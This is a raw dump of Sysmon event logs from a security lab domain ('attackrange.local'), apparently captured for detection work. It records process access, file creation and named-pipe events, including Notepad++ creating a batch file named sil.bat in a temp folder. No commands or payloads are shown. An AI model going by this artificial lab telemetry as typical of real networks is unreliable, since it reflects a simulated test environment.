07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046309Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046308Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046307Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046306Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046305Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046304Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046303Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046302Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046301Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046300Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046299Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046298Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046297Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046296Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.188{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5A3C8593E82D29664F3787259A9DA27,SHA256=F250575B6866B786E7DD17850DB3F289C3029507664B5C95959DA0BCD7BA59FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806221Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:04.972{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70523A397E49FBE0F104DC9D88633F0B,SHA256=624BDBC95E2605F55EFCB549906BA7E0C0567FF6D99A39661469D959C523BFF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046357Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:04.754{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=67C81478DF0D8F416C51AE3ED34C2D1A,SHA256=421832B6BD625ACE8673263D4FC1AA1D22A8E7FD2EE1EE9D7EC0534D47C939F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046356Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:04.753{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CE20666FB96508EBED0BE6DE0EBDEB36,SHA256=A888477990D04CA54E85EB7406D2476F4F2242923DD89AA26B544C760C685207,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046355Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:04.204{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D1F466A2571EFDEF895492EC62D18FB,SHA256=4AF5D718CB99C382D508F66626AC298AEC9D5F42906B1B259553DDF304E46305,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806222Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:05.972{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C64A7F2C0158B59B8F3C915C7BF470C9,SHA256=07774EB211BC7B768D5F593B2795241875E8F1D48F4E35A46094EE327F4B31BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046358Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:05.219{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D72DA320E01B870542450ECC0D138F96,SHA256=DF58F477DD82E20A35FEDBD8DF12449B29E4F846F0FD3AF89CD72F9F0CEA5BC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806223Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:06.987{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2CF44981452B1AD0BD78BD4D8F07291,SHA256=32CCF55162CC8236EB745EC1DA26AC2737286FEDD34CAF2DE6B61117B248FFBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046367Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:06.619{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\sil.bat@2021-07-12_074455MD5=42C6E3878971CD6C021BE6EC19E67ECE,SHA256=371CF11D7C4C74777B864345F740C71BCFA824D7DEF1E0114EBB6F5F6C86C609,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001046366Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:06.619{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sil.bat2021-07-12 07:44:38.363 23542300x80000000000000001046365Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:06.619{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sil.batMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001046364Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:06.254{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D1E46714E1A4C25A1A2D43747343CD3,SHA256=46280B27FE1154D05100167778FBFFE7D2EF2BA1CAEB7D1DFA401CFE38D78E45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046363Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:06.134{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046362Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:06.087{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5CC7-60E8-0D11-00000000CF01}7760C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla 
Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001046361Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:06.087{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5CC7-60E8-0D11-00000000CF01}7760C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 
18141800x80000000000000001046360Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:45:06.087{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.7760.375.29551504C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001046359Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:45:06.087{466BC892-5CC7-60E8-0D11-00000000CF01}7760\chrome.7760.375.29551504C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000806224Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:07.987{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=484CA919A5FC2644C90BC471D7A35938,SHA256=8AAE2581CFB035B65812CF8399C79F60FA6146B62417AEC560E1361BC59626A8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046383Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:07.403{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046382Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:07.403{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046381Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:07.403{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046380Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
